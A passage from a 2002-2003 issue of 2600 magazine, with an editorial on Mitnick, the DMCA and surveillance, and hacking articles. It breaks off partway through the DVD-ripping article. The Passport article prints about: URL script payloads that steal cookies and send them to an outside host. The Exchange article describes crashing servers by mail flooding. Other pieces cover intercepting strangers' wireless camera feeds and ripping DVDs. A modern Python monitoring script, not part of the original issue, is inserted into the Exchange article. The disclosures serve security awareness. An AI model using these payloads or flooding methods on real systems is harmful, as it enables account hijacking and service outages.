2600
Volume Nineteen, Number Four, Winter 2002-2003
$5.00 US, $7.15 CAN

"Voice or no voice, the people can always be brought to the bidding of the leaders. That is easy. All you have to do is tell them they are being attacked, and denounce the peacemakers for lack of patriotism and exposing the country to danger. It works the same in any country." - Hermann Goering, Hitler's designated successor, before being sentenced to death at the Nuremberg trials.

Editor-In-Chief: Emmanuel Goldstein
Layout and Design: ShapeShifter
Cover Photo: Fur Harald & Erhard
Cover Design: Mike Essl
Office Manager: Tampruf
Writers: Bernie S., Billsf, Eric Corley, Dalai, John Drake, Paul Estev, Mr. French, Javaman, Joe630, Kingpin, Lucky225, Kevin Mitnick, mlc, The Prophet, David Ruderman, Seraf, Silent Switchman, Mr. Upsetter
Webmasters: Juintz, Kerry
Network Operations: mlc, Seraf
Broadcast Coordinators: Juintz, Pete, daRonin, Digital Mercenary, Monarch, w3rd, Gehenna
IRC Admins: Antipent, DaRonin, Digital Mercenary, Redhackt, Roadie, Setient, The Electronic Delinquent
Inspirational Music: Death in Vegas, Good Courage, Tom Petty, Monoman, Royal Trux, Holger Czukay, Space Robot Scientists
Shout Outs: Ed Hernstadt, LOcke, Tim Pritlove, Tina, Zapphire

2600 (ISSN 0749-3851) is published quarterly by 2600 Enterprises Inc., 7 Strong's Lane, Setauket NY 11733. Second class postage permit paid at Setauket, New York.

POSTMASTER: Send address changes to 2600, P.O. Box 752, Middle Island, NY 11953-0752.

Copyright (c) 2002 2600 Enterprises, Inc.

Yearly subscription: U.S. and Canada - $20 individual, $50 corporate (U.S. funds). Overseas - $30 individual, $65 corporate. Back issues available for 1984-2001 at $20 per year, $25 per year overseas. Individual issues available from 1988 on at $5 each, $6.25 each overseas.

ADDRESS ALL SUBSCRIPTION CORRESPONDENCE TO: 2600 Subscription Dept., P.O. Box 752, Middle Island, NY 11953-0752 (subs@2600.com).

FOR LETTERS AND ARTICLE SUBMISSIONS, WRITE TO:
2600 Editorial Dept., P.O. Box 99, Middle Island, NY 11953-0099 (letters@2600.com, articles@2600.com).

2600 Office Line: 631-751-2600
2600 FAX Line: 631-474-2677

Material

Positivity
Passport Hacking Revisited
Lazy Exchange Admins
Warspying
CD Media Data Destruction
How to Make a DVD Backup
Honeypots: Building the Better Hacker
DNS Redirection Stopped
More on Telemarketing
Cracking Voter Fraud
Linux on the Xbox
Removing Spyware and Adware
Exposing the Coinstar Network
A Dumpster Diving Treasure
DMCA vs. DMCRA
Letters
.ncsc.mil (144.51.x.x)
A Brief Introduction to Deepfreeze
Beating Download Manager Protection
DHCP is Your Friend!
Marketplace
Meetings

Positivity

In the fast paced culture that we seem to find ourselves caught in the middle of, it's very easy to get stuck in a default mood of euphoria or despair. Lately it seems that we've been despairing quite a bit. We're certainly not alone. While it's very important to not lose sight of the bad and ominous things that are happening in the world of technology and what it could do to people like us, nothing is gained if we lose our overall positive outlook. We certainly couldn't have kept on publishing for nearly twenty years if we didn't feel a strong sense of hope for the future. There will never be a shortage of negative issues to focus upon. Let's take a brief moment to look at the positive developments.

By the time you read this (and hopefully barring any last minute unfortunate circumstances), the excruciatingly long ordeal of Kevin Mitnick will have finally reached an end. January 20, 2003 was the date that Mitnick's supervised release came to an end - three years after his release from prison. That means that he will once again be able to use the Internet, travel without having to ask permission, and talk to anyone he wishes to without having to check to see if they've ever been convicted of a crime.
Most of us take these freedoms for granted so it's hard to even imagine what life must be like without them.

In these past three years, Mitnick has become a model for someone who can overcome adversity and triumph in the end. Despite five years of isolation and the aforementioned restrictive conditions upon his release, he refused to let the system defeat him. The authorities made it almost impossible for him to earn a living - insisting that he not be allowed anywhere near a computer and at one point suggesting that he pursue a career in fast food. Instead Mitnick landed a job at a major talk radio station and answered listener questions about technology. He had kept himself educated on all the technological advances, despite being incarcerated and forbidden from experimenting with them upon his release. More recently he had a book published on the intricacies of social engineering and went on a government-approved speaking tour to promote it. Throughout this, Mitnick found time to testify before a Senate subcommittee on the dangers of bad technology and uninformed people. He also provided key evidence in a case against Sprint who had the audacity to claim that their switches were unhackable.

It would have been easy to dwell on the negative in this case - and there certainly was no shortage of negativity. After all, Mitnick hadn't actually had a real day of freedom since 1988 meaning that when all is said and done, fifteen years will have gone by since this all started. And in all that time, there was never a charge filed against Mitnick of anything more substantial than making free phone calls and looking at source code that didn't belong to him. It was all an incredible waste of time.

But we get nowhere by letting our bitterness dictate how we live. We have everything to gain by continuing forward in our spirit of curiosity, education, and rebellion against conformity.
There's always a price to pay in order to take those steps and sometimes it's a heavy price. Dmitry Sklyarov spent time in an American prison and was unable to return to his native Russia for nearly six months - simply because he wrote a program that could be used in a way that violated the absurd Digital Millennium Copyright Act. It made no difference that he wrote the program in another country. Even Adobe, the company that originally pressed charges against Sklyarov, realized how ridiculous the whole thing was and tried to drop it. But it was too late and the American justice system went to work, eventually putting Sklyarov's company (Elcomsoft) on trial instead in exchange for his testimony. The authorities didn't count on the defendants putting on a strong fight and they didn't count on the massive show of support for Sklyarov.

There's a reason so few cases ever make it to a jury. People are rightfully terrified of the system and what it can do to them. It's ironic that it took someone from outside our country to stand up to the system and refuse to be intimidated. The trial took place in December and it only took the jury one day to rule in Sklyarov's and Elcomsoft's favor. Part of the DMCA stipulates that there has to be intent and this was something the jury was unable to find in this case. It doesn't address the overall stupidity of the law itself which means there will be more such cases. But it's a good sign and a significant step towards fixing the numerous problems caused by this horrible legislation. And most importantly, it's proof that determination and standing by one's convictions can ultimately lead to victory.

We have to also remember that there's a big world out there, one that doesn't always initially grasp the importance of the issues we value. It's easy to dismiss the general public as ignorant and pawns of the mass media. But, as in all things, the truth is never quite that simple.
The general public can get it, they do tend to value the things that we do, and they are most definitely not the enemy. The jury in the Elcomsoft case is living proof of this. The key is getting the message out.

Over the past year or so we've reported (along with many others) some of the really bad ideas that have been passed down from Capitol Hill as a "response" to terrorism - things like the Patriot Act, the Homeland Security color scheme, Operation TIPS, Total Information Awareness, etc. And while many of these things are still around, public awareness and public criticism has soared - and it's most definitely made a difference. People are taking more time to think these things through and more of them seem to be realizing that diminishing our freedoms really isn't going to accomplish a whole lot - other than diminishing our freedoms.

We've seen less talk of the alert status color coding system as it becomes mocked more than it's used. The TIPS system was heavily criticized for its Stasi-like system of informing on one's neighbors and having untrained civilians prowling around looking for potential thoughtcrime. And in true Orwellian style, all mention of TIPS was removed from the citizencorps.gov website where it had been prominently featured. It never happened.

The Total Information Awareness initiative is still very much with us. In their own words, TIA is meant to be a "total reinvention of technologies for storing and accessing information... although database size will no longer be measured in the traditional sense, the amounts of data that will need to be stored and accessed will be unprecedented, measured in petabytes." All of this will supposedly identify terrorists by having every conceivable bit of data easily available - from medical records to credit card purchases to Internet activity.
It doesn't take much to figure out that since they don't know who the terrorists are they will have to scrutinize all of us using these yet to be invented tools. It's clearly a sensitive topic for the folks at Defense Advanced Research Projects Agency (DARPA) who won't even reveal how much money is being allocated for this. While public pressure has yet to kill this beast, it's probably one of the few things that can. Public ridicule has already put an end to the TIA logo - a pyramid with an all seeing eye within it, apparently looking out over the globe. That also never happened.

As we go to press, yet another monitoring plan is being announced - this time one that makes Carnivore look friendly. It's part of a report entitled "The National Strategy to Secure Cyberspace" and it would require Internet Service Providers to participate in a centralized system that would theoretically allow the entire Internet to be monitored along with its users. The apparent frustration the government is feeling is summed up in this statement by one of the plan's coordinators: "We don't have anybody that is able to look at the entire picture. When something is happening, we don't know it's happening until it's too late." That is why the plan will fail. What they want is not only impossible but it flies in the face of everything the net represents. It would be the equivalent of wiretapping everyone at all times and we suspect most people just aren't going to go for that. Expect a backlash on this like nothing we've ever seen - if this scheme even makes it to spring.

Absurd and ridiculous as some of these plans may be, it's no excuse for not remaining vigilant and fighting those who endanger our freedom. Our victories may appear to be few and far between but they are quite significant. As is the fact that none of them could have been accomplished without a degree of organization and activism.
Whether the cause is ending the suffering of a single person, overturning a really bad law, or preserving everyone's right to privacy, reaching out to like-minded individuals and helping to make it a major issue is critical. It's gotten us this far and it will continue to be our strongest weapon.

Passport Hacking Revisited
by Chris Shiflett
chris@shiflett.org

This article is a follow-up article to "Passport Hacking," an article published in 18:3. Much of the information here is given under the assumption that you are familiar with the original article, so you should read it first. The original article was the first to reveal the security vulnerability in Microsoft Passport that prompted Microsoft to discontinue the Passport service for a short period of time while improvements were made. Other articles have appeared since the original, and it has been translated into several different languages. Unfortunately, the Passport mechanism possesses the same fundamental flaws that it did when the original article was written, though attempts have been made to mitigate these risks by imposing shorter timeout periods and requiring users to re-authenticate themselves more often.

Background

In "Passport Hacking," I introduced the Microsoft Passport mechanism and its inherent insecurity characterised by a complete dependence on cookies. Though cookies can be an adequate means of maintaining state in HTTP transactions, they are a poor choice for user authentication. Using cookies and URL variables, Microsoft communicates with Passport enabled sites through the user alone; there is no server to server communication. This is the fundamental design flaw that exposes Passport users to all of the security vulnerabilities that have been published to date.

The vulnerability used to compromise a Passport account in the original article involved using a malformed URL to expose a user's cookies to an unauthorized website.
This vulnerability only existed in Microsoft Internet Explorer versions 4.0 - 5.0, so this technique could not be used to compromise the Passport account of people using Internet Explorer versions 5.5 and 6.0. This article will demonstrate a technique that can be used to compromise the accounts of people who use these newer versions of Internet Explorer and will direct Internet Explorer users to the patch that will fix this vulnerability.

The Vulnerability

The vulnerability that exists in Internet Explorer versions 5.5 and 6.0 was originally alluded to on the web at http://www.solutions.fi/index.cgi/news_2001_11_08?lang=eng. In order for a website to gain unauthorized access to a user's cookies, an about: URL is used to deceive the web browser so that it executes client-side scripts in the local context with regards to security restrictions. Thus, a client-side script can potentially have as much access to your computer as you do.

An example of a URL exploiting this vulnerability is the following:

about://<script%20language=javascript>alert('This%20browser%20is%20vulnerable.')</script>

A vulnerable browser will execute this client-side script, which will display the following alert box:

The significance of this is more extreme than this example illustrates. Because Internet Explorer executes this client-side script in the local context, this script has fewer security restrictions than client-side scripts that Internet Explorer believes to be sent from a remote web server. In addition, we can make a simple modification to our URL to make the domain checking mechanism in Internet Explorer mistake the URL for one from any domain we choose when it checks for cookie restrictions. For example:

about://www.passport.com/<script%20language=javascript>alert(document.cookie)</script>

If you are currently logged into Microsoft Passport when visiting this URL, an alert box similar to the following will appear:

[Screenshot: alert box listing the user's Passport cookies]

All cookies that would be made available to a server-side script in the www.passport.com domain will appear in the alert box.

The significance of this example is that we now have a technique for executing a client-side script that has access to any cookies from any domain we choose. When combined with Passport's complete dependence on cookies, the danger should be clear.

The Compromise

The only step remaining for a complete compromise is to establish a method to get the cookies sent to the web server where they can be stored and subsequently retrieved by the imposter. To do this, I will use a URL similar to the last example, except that the script will redirect the user to a remote URL and append the cookie data in the query string of that URL:

about://www.passport.com/<script%20language=javascript>document.location='http://shiflett.org/demos/passport_hacking_revisited/?cookies='+document.cookie</script>

The most dangerous characteristic of this technique is that no interaction from the user is required. Because of this characteristic, an attacker can redirect the user through many URLs that will compromise the cookies from many different domains rather than just one.
This makes Internet Explorer versions 5.5 and 6.0 even more dangerous than the previous versions with regards to cookies. In addition, this compromise is even easier to achieve than the original, requiring very little expertise on the part of the attacker.

Once the cookies are stored on the web server, a technique must be established to store these cookies on an imposter's web browser. Many methods can be utilized for this step, and the original article gives sample code for one. This final step will complete the impersonation, and the imposter can then pose as the user whose account was compromised by visiting any Passport enabled website.

Summary

Due to the fundamental flaws in the design of the Passport mechanism, I do not recommend that it be used in conjunction with sensitive data or personal information. The convenience is not worth the security risk, and it is likely that this article does not represent the last of such risks. As I mentioned earlier, the mechanism used is fundamentally flawed; articles such as this merely describe techniques that can be used to exploit these flaws.

For those who are currently using a vulnerable web browser and wish to continue to use it, visit http://www.microsoft.com/windows/ie/downloads/critical/q313675/default.asp and install the security patch. There are many websites that utilize cookies in order to maintain state, and using a vulnerable browser places you at risk of many attacks similar to the one described here.

An interactive demonstration of the technique described in this article is located at http://shiflett.org/demos/passport_hacking_revisited/.

Lazy Exchange Admins
by ddShelby

Security in Exchange is or should be a concern for many admins out there because of its fairly widespread use in many small to mid sized organizations. It does have some worthy features but also has some serious security concerns (like everything from Redmond) that need to be attended to.
And that is the purpose of this article. To inform and educate those who read it and maybe expose a few Exchange admins to some information they might find useful. So let's get started.

As an admin you have the ability to create an account during install that is not the same as the default administrator account in the OS. But not many elect to do this because of the log on/log off hassle to administer the OS along with a separate account to administer Exchange. If a separate Exchange admin account was not created at the time of install (which is almost always the case) and it's an NT4 server, then it's almost guaranteed that administrator@whoever.com exists, because you can't rename the administrator account for the OS in NT. If it's a Win2K server with Exchange 5.5 or Exchange 2000, the same is also true. But with the ability to rename the default administrator account in the OS, there is a chance it was renamed at the time of setup. In both cases (assuming default) the administrator account for the OS has an SMTP address that follows the convention: administrator@whoever.com. If the OS is NT4, then it's a shoo-in unless the SMTP settings were edited by the admin. This is the problem.

Some Basics of Exchange

The standard versions of Exchange 5.5 and 2000 both have a limit on the size of either the public or private database (priv.edb and pub.edb). They cannot exceed 16 GB each. The Enterprise versions of 5.5 and 2000 are not limited to anything except available drive space. With server drive space still somewhat costly (assuming the server runs with some form of SCSI and raid), reaching this limit is not difficult for most organizations of a dozen users or more. Two reasons why it's so easy to get to 16 GB or reach the server's available drive space limit are the disregard of most admins towards limiting users' mailbox size and the users' habit of using the Outlook deleted items folder as an archive folder.
The admin has the ability to force notification limits on users' mailbox size on either a global or per user basis. The spam issue is also partly to blame since everyone just deletes it, but the mentality of using the deleted items folder as an archive comes back to haunt again, only adding to the total size of the database. So the 16 GB limit is in many cases closer than one might think. This is especially true if none of the limits were ever put in place and the server has been in use for a year or longer. It's made worse by the fact that small organizations don't need a monster server to run Exchange 5.5 and with the hardware requirements set forth by Win2K server, many have elected to stay with NT4 and Exchange 5.5. An NT4/Exchange 5.5 server could easily serve a dozen users on a P200 with 32 megs of ram and a single 10 GB IDE drive. Don't laugh. I've seen it.

Getting back to the point. Any Exchange server is vulnerable to getting swamped and not by some new hack. You can crash Exchange by simply knowing any e-mail address of any recipient on any given server. The ugly part is this could potentially happen over days or weeks or even months before it's even noticed or it's just too late. Since Exchange by default has an account assigned to the Administrator of the OS, an SMTP address exists for it. If you assume that the administrator account is not actually in use but still exists, one could theoretically swamp an Exchange server by sending numerous e-mails with large bogus attachments. Or if the sender's ISP does not impose limits on the size of outgoing mail, one large attachment could do the same. To use any general user's address is slightly more difficult since users usually read their mail. But the administrator account is almost never used since admins set up an address for themselves and use it instead.
As drive space comes close to zero available, the Exchange service that handles SMTP (IMS) shuts down and all incoming mail is rejected. But since the information store service (the database) usually continues to run, and if the admin is smart enough to check the private information store listed in Exchange Admin, he would see the tremendous size of the mailbox and then just log into it and clean it out. An easy fix for this is to just edit the SMTP address of the administrator account to something obscure. In addition, you could disable any unused SMTP addresses to help prevent getting swamped. A periodic check of available drive space or the size of the .edb files would be useful, but seems to escape many admins.

But Wait, It Gets Worse

As opposed to reaching the drive space limit, if the 16GB database limit is reached instead, it becomes a whole different story. If the Enterprise version is installed before the 16 GB limit is reached, then disaster can be avoided. However, if the 16GB limit is reached before upgrading, the information store service is shut down automatically and can't be restarted. The result from this is all incoming SMTP messages are rejected at the server and no user can log in to their respective mailbox. And the admin can't get the service started to log in and delete the offending content. As an admin you can purchase the Enterprise edition for two grand, but installing it on top of the standard edition doesn't quite solve the problem. All is not lost - there is a workaround for this listed in the Knowledge Base that explains how to copy the database into the active folder (usually exchsrvr\MDBDATA) after you install the Enterprise version. But if the database has reached the 16GB limit you'll be copying for a while. If the admin is savvy enough, he could play the game of just renaming folders instead of copying.
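
The periodic check recommended above, as an added example (not code from the article): it compares priv.edb and pub.edb against the 16 GB Standard edition cap, checks free drive space, and uses recorded daily sizes to project the days left before the cap and to flag a sudden jump in growth such as a flooded mailbox would cause. The thresholds, function names and sample history are assumptions made for illustration.

```python
import os
import shutil
from statistics import median

GIB = 1024 ** 3
MIB = 1024 ** 2
STORE_LIMIT = 16 * GIB                  # Standard edition cap per database (from the article)
STORE_FILES = ("priv.edb", "pub.edb")   # store files named in the article


def store_status(size, limit=STORE_LIMIT, warn=0.75, crit=0.90):
    """Classify one store file by the share of the cap it has used (thresholds assumed)."""
    used = size / limit
    if used >= crit:
        return "crit"
    return "warn" if used >= warn else "ok"


def disk_status(free, total, min_free=0.10):
    """Flag the volume well before free space nears zero and incoming mail is rejected."""
    if total <= 0:
        return "crit"
    return "crit" if free / total < min_free else "ok"


def days_until_limit(samples, limit=STORE_LIMIT):
    """Project days until the cap from (day, size) samples, oldest first.

    Fits a least-squares line through the samples; returns None when there are
    too few samples or the store is not growing.
    """
    n = len(samples)
    if n < 2:
        return None
    mean_x = sum(day for day, _ in samples) / n
    mean_y = sum(size for _, size in samples) / n
    sxx = sum((day - mean_x) ** 2 for day, _ in samples)
    sxy = sum((day - mean_x) * (size - mean_y) for day, size in samples)
    if sxx == 0 or sxy <= 0:
        return None
    slope = sxy / sxx                   # bytes per day
    return max(limit - samples[-1][1], 0) / slope


def growth_spikes(samples, factor=5.0):
    """Return the days whose growth exceeds `factor` times the median daily growth."""
    deltas = [(d2, (s2 - s1) / (d2 - d1))
              for (d1, s1), (d2, s2) in zip(samples, samples[1:]) if d2 > d1]
    positive = [growth for _, growth in deltas if growth > 0]
    if len(positive) < 3:               # not enough history to call anything unusual
        return []
    typical = median(positive)
    return [day for day, growth in deltas if growth > factor * typical]


def audit(sizes, free, total, history=None):
    """Combine the checks into one report keyed by store file name."""
    report = {name: store_status(size) for name, size in sizes.items()}
    report["disk"] = disk_status(free, total)
    for name, samples in (history or {}).items():
        report[name + ":days_left"] = days_until_limit(samples)
        report[name + ":spikes"] = growth_spikes(samples)
    return report


def collect(mdbdata_dir):
    """Read the live store sizes and volume usage from the database folder."""
    sizes = {}
    for name in STORE_FILES:
        path = os.path.join(mdbdata_dir, name)
        if os.path.exists(path):
            sizes[name] = os.path.getsize(path)
    usage = shutil.disk_usage(mdbdata_dir)
    return sizes, usage.free, usage.total


# Constructed sample: priv.edb grows 20 MB a day, then jumps 900 MB on day 4.
SAMPLE_HISTORY = {"priv.edb": [(0, 10 * GIB),
                               (1, 10 * GIB + 20 * MIB),
                               (2, 10 * GIB + 40 * MIB),
                               (3, 10 * GIB + 60 * MIB),
                               (4, 10 * GIB + 960 * MIB)]}

if __name__ == "__main__":
    sample_sizes = {"priv.edb": SAMPLE_HISTORY["priv.edb"][-1][1], "pub.edb": 2 * GIB}
    for key, value in audit(sample_sizes, 3 * GIB, 40 * GIB, SAMPLE_HISTORY).items():
        print(key, value)
```

Run it from a scheduled job, appending each day's sizes from collect() to the history so the projection and spike check have data to work with.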
But with so many Windows admins who changed careers from grocery bagging, it's unlikely they're smart enough to figure that out. And as the Knowledge Base article suggests to copy the edb file, it seems to me that at least one employee at Redmond didn't figure it out either. Admins could also defrag the database with a utility included with Exchange in the exchsrvr\bin folder called eseutil (both 5.5 and 2000). This would buy enough time to delete enough and recover. But if the SMTP service IMS is running and email is still incoming, it could be a race to delete before it reaches its limit again. In addition, the defrag needs drive space equal to or greater than the size of the database. But this inevitably brings me back to admins who were bagging groceries six months ago. Another safety net would be to implement a second MX record for the domain with a higher cost route, so any incoming mail rejected by Exchange would be collected on another machine. Then with ETRN you could dequeue the mail from the higher cost server and no mail would be lost.

Discovery of a Server

Regardless of the presence of a firewall, by using one of the many port scanners an Exchange server is easy to find. I use Super Scan on my Win2K laptop but many others work just the same. A scan of a range of addresses to port 25 will eventually reveal an open port. If it's an Exchange server it will identify itself as such, as well as the version and build. For example,

25 SMTP 220 server.domain.whoever.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2653.13) ready.

In this example it's a 5.5 SP4 server. With that, the domain is known, the administrator address can be correctly assumed 95 percent of the time or better, and the rest is up to any delinquent with nothing better to do. Or at some point some worm will make its way to the Internet and play this same game, only faster.

Warspying
by Particle Bored

Are you having a hard time figuring out what to do with your X10 camera now that you are done playing practical jokes on friends and family? For less than $50 you can put the X10 receiver in your car and begin screwing around with complete strangers.

Standard disclaimer: I don't accept responsibility for my own actions, so I definitely won't assume responsibility for yours. If TVs in vehicles are illegal in your area, or should you get decapitated from a TV flying around in your car, it's your problem.

Here is what you will need to get started:

Jensen J53-RW TV/Monitor (only $25 at Target)
X10 Receiver
DC Power cord with "L" connector
DC Power "Y" adapter
Velcro

The Jensen TV is a 5" black and white portable monitor that has both video and audio RCA input jacks. It can run on AC, DC, or batteries and comes with a car lighter adapter.

The X10 receiver is intended for indoor use, so it is shipped with only an AC adapter. If you look at the output of the adapter though, you'll see that it is 12 volt DC which means you can run the receiver straight off your car battery. Since I wanted the system to be easily removed, I decided to power it with another lighter cord (the one with the "L" connector). It is positive-tipped, so make sure you have the polarity right.

Now plug everything together. Nearly all of the connectors can only go in one place. The RCA connectors are fully color-coded, so if you can't figure out how to do it, fire up the IM client on your Mac and ask your grandmother.

I mounted the monitor and receiver on my dashboard with Velcro. If this method obstructs your view you can put the monitor on the passenger seat or floor. Make sure you don't mount anything where it might hinder the deployment of an airbag.

Now hit the road. I found my first camera within 60 seconds on the very next block. I typically find one about every 15 minutes.

In closing here are a few things I learned the first day:

- Don't worry about the channel switch on your receiver - most folks leave it on the default channel "A".
- The transmitters have a range of only around 100 yards so you will need to be somewhat close to your target.
- You'll tend to get audio before video, so you'll know you are onto something when the static on the TV goes away. Keep your eyes on the road and pull over when you start receiving audio.
- You'll notice several definite patterns appear on the monitor at times. For example, I have seen both narrow and wide horizontal lines. If you identify the devices that cause them, write to the Letters section of 2600 and let everyone know. I would bet one of them is a 2.4 GHz cordless phone....
- I was able to get perfect cable TV twice. Is someone using wireless for extensions or something?

CD Media Data Destruction
by Gr3y t0qu3
greytoque@paladindesign.ca

While we as hackers have an obsession with freedom of speech we also have an obsession with data destruction. I wrote this article to quell my - and many other peoples' - interest in the latter specifically dealing with CDs. I've heard nuking the CD in a microwave is not 100 percent successful in destroying the data. It was stated in "How to Hack From a Ram Disk" in 18:4. I tried to find information on this topic but there really is none out there, so I decided to take this task on for myself.

When I started doing research for this article I realized that there are many ways to destroy CD-ROM, CD-R, and CD-RW media.
The first things I found were targeted towards commercial uses. I found products that used "micro indentation" to "reliably penetrate the data surface of target media, destroying any readable data" and as a side effect the CD went from round to an oval shape. Sure sounds good, right? Well if you have $5k to waste it's great. Then there's some that grind away the recording surface. The one I found cost $1GL. Both of these solutions are not priced for the average person. Simply deleting the files from a CD-ROM/R/RW won't work either. There are plenty of software suites out there for recovering data from them. I found one for $39.95 and there was even a free 30 day trial. So if you have a low tech adversary you're hiding the data from even that wouldn't work. The software can also recover data from quick formatted CD-RWs, where the data is left there just to be overwritten at a later time (the same concept as recovering deleted data from your hard drive - the reference to the data in the drive table is removed, the data isn't touched).

Let's get to the main point of the article: Does data destruction with a microwave really work?

First, to understand if the microwave is an effective way to destroy data you need to understand how CDs are made. All three types of CD (CD-ROM, CD-R, and CD-RW) are different. In the next little while I'm going to look at the three different types and explore if it will work for each.

CD-ROMs are exactly what they say, CDs with Read Only Memory. Most of a CD-ROM consists of a piece of clear polycarbonate plastic. During manufacturing, this plastic is impressed with microscopic pits arranged as a single, continuous, extremely long spiral track of data. Once the plastic is formed, a thin, reflective aluminum layer is "sputtered" onto the disc, covering the bumps. Then a thin acrylic layer is sprayed over the aluminum to protect it.
A CD reader reads CD-ROMs by sending out a laser beam that passes through the plastic layer, reflects off the aluminum layer and hits a device that detects changes in the amount of light it receives. The bumps, commonly called pits because if you could see them they would look like pits from the label side of the CD-ROM, reflect the light differently from the lands. The lands are the rest of the aluminum layer.

The aluminum layer is very, very thin. When you nuke a disk, large currents flow through the aluminum. These currents produce enough heat to vaporize the aluminum. You then see a very small lightning storm as electric arcs go through the vaporized aluminum. There will be many paths left etched through the aluminum after this. So with the aluminum vaporized a CD player won't be able to read the data anymore. Because of the extreme heat of the aluminum the plastic above and below the aluminum would also be damaged. I'd be guessing the aluminum paths left would be horribly warped. Just think about what would happen to you if you were subjected to that kind of heat. I'm fairly confident that this is a 100 percent secure method of data destruction as you would not be able to somehow inject a new reflective material and fill up the microscopic pits as they would be damaged. Sure, that's all great if you happen to have a Windoze CD sitting around that you don't want anyone to have to experience the horror of.

So what about CD-Rs? Instead of there being pits imprinted into the plastic of a CD-R there is an extra layer. This extra layer is a greenish dye right below the reflective material. A write laser heats up the dye layer enough to make it opaque. The read laser in a CD player senses the difference between clear dye and opaque dye the same way it senses bumps - it picks up on the difference in reflectivity. So when you nuke a CD-R the gold/aluminum layer vaporizes.
If that is the only effect then it would be possible to cut the CD where the aluminum/gold layer used to be and then put a reflective substance on top of it and stick it in a CD player. This would require very, very fine instruments as a CD is only 1.2mm thick. But the main variable is how hot the aluminum/gold is when it vaporizes and if it is hot enough to change the state the dye is in - from transparent to making the whole disk opaque to a reader. From looking at a few nuked CD-Rs I think that most data would be lost. On a blank CD that is nuked, there is a "loose swirly" pattern of the different shades (written and unwritten), effectively making true data impossible to find. On CDs with data it would do the same and so a lot of data would be lost. So on CD-Rs it's not really a guaranteed process of having your data fully and completely removed. Although if you're up against someone like the NSA/FBI/CIA who are going to all the trouble to find that information you have far bigger problems on your hands and I'm guessing you'd never see a public court.

CD-RWs are a little different again. Instead of the dye layer there's a phase-change compound composed of silver, indium, antimony, and tellurium. This recording layer is sandwiched between dielectric layers that draw excess heat from the phase-change layer during the writing process. A CD-RW drive has to use three different lasers: a read laser, a write laser, and an erase laser. To write to a CD a laser beam heats areas of the phase-change material above the melting temperature (500-700C), so all the atoms in this area can move rapidly into a liquid state. Then, if cooled quickly enough, the random liquid state does not reorder its atoms back into a crystalline state. To erase, a laser heats the same area to above the crystallization point - 200C - and then lets it cool quickly so that the atoms reorder themselves.
The read laser is much less powerful. The dielectric layers that are above and below the phase-change compound are by definition "poor conductors of electricity and will sustain the force of an electric field passing through it." So that would not allow much of the electric field caused by the microwave to be able to reach the phase-change compound layer where the data is stored. But then again, it's not made to stand the bombardment by a microwave. Also, it's a heat insulator so the temperatures caused by the reflective layer vaporizing will not affect it too much either. So again with advanced tools it might be possible to remove the damaged material and put on a new reflective layer.

Unfortunately I have no way to find this out for sure. I would like someone to write a follow-up to this article with actual lab data (University). As you can see it is not known if microwaving is a 100 percent secure form of data removal for CD-Rs and RWs. It is one of the most secure options there is. It should hold up unless you have POTUS (President of the United States) really pissed off at you. Local police agencies and the FBI probably do not have the technology to retrieve data from a nuked CD. Most of the people who argue that this is possible also argue that "they" would just go back in time to before you nuked the CD....

Greetz: Spiffy and Syphet.

[Image: check from Bankruptcy Services LLC, as agent for PSINet Liquidating LLC, drawn on HSBC Bank USA, New York, NY]

Some of you may remember a problem we had with a company called PSI back in 1995. To put it briefly, we were misled into signing a contract for ISDN service that didn't exist and almost lost a sizable down payment. Once we publicized the situation and stuck audio evidence of their deceit on our website, we got a refund in full.
More recently, PSI went bankrupt (and no, we don't feel guilty). For some reason we wound up on their list of creditors and eventually received this check. They also managed to rename us from 2600 to 5393. We don't really understand any of it but if this is how they ran things, we may understand how they went bust.

How to Make a DVD Backup

by Maniac Dan

Disclaimer: Copying DVDs to sell or DVDs you do not own is illegal and immoral and should not be done.

After reading the letter in 19:3 questioning the methods of DVD copying, I decided to write an article detailing exactly how it's done, or at least get it close enough for normal people to make backups of their DVDs. I've only tested this on Region 1 NTSC DVDs. Readers in other countries should find a guide for their region and video format. Sorry. I also find it useful to bring a stack of VCDs with me on trips, since my laptop doesn't have DVD capabilities. Anyway, I'm going to detail the methods for ripping to either AVI, VCD, or SVCD. Some of the steps are the same, but for steps that are different, I will assign them both a number and a letter, so 3(A) is the AVI instructions, 3(V) is VCD, and 3(S) is SVCD. Any step that applies to all three formats will have no letters.

In order to rip to AVI, you need Smartripper and DVD2AVI. To rip to VCD and SVCD, you need these files plus TMpgEnc and BBMpeg. Also, for the ripping process to work on XP or some versions of 2K, you need a valid aspi layer driver. To burn your CDs you need software that supports VCD and SVCD burning, like Nero. (Links for these programs are at the end of this article.) Now for the steps:

1: Insert the DVD and play it for a few seconds in a software DVD player. This will "unlock" the DVD and allow you to rip it using Smartripper.

2: Load up Smartripper and take a look around. At the bottom of the screen is a "Target" box which needs to be filled in with a valid folder name.
The rest of the first page is chapter selection for if you only want to rip certain scenes (like Monty Python sketches). The second tab is called "Stream Processing" and allows you to select the languages and special tracks you want ripped. I usually just rip them all and then only convert the English track, but if you're hard pressed for drive space, then cut out what you don't want. Next, click the settings tab. Under settings, I recommend setting key-check to "Every VOB File" and filesplitting to "Max Filesize". Now set the max-filesize to 10,000MB (10gb). This way the movie will be ripped to one big file on your hard disk. (Warning! This is only possible with NTFS. If you have a FAT file system, set max-filesize to 4,000MB.)

3: Click start and wait until the DVD is finished. It shouldn't take more than an hour.

4: Fire up DVD2AVI. Once again, I recommend taking a look around the program before blindly trying to follow my steps. Go to file->open. A blank box will appear with three buttons on the left side. Click "Add" and add the file(s) you just ripped to the box, then click OK.

5: Press F5 to make sure the movie looks OK and the VOB files are in the right order. You will not have audio and the video will be fast. This is normal. Make note of the aspect ratio on the box that pops up along the right side. You are almost ready to convert to either AVI or d2v/wav. Check your menu settings. For audio: Track number should be "1", channel format should be "Auto", Dolby Digital should be "Decode", MPEG Audio should be "Demux", and 48->44.1 should be off. Video settings should be left alone.

6(A): AVI users rejoice! This is the last step for you! Go to file->save AVI, pick a filename and location, and click "Save". Now a box pops up asking you to select your preferred video compression method. Choose your poison (I recommend DivX 5.0.2) and click OK, then sit back for a few hours while it converts. If the file is too large, find an AVI splitter out there.
I've heard AVIChop is good.

6(VS): VCD and SVCDs need a few more steps. Still in DVD2AVI, click file->save project. Name the project and click "Save". It will run through the movie file once or twice and then beep when it finishes. This process should take less than the ripping process, but it depends on your processor. Once it's done, write down the contents of the "Aspect Ratio" and "Video Type" boxes. We need that information in TMpgEnc.

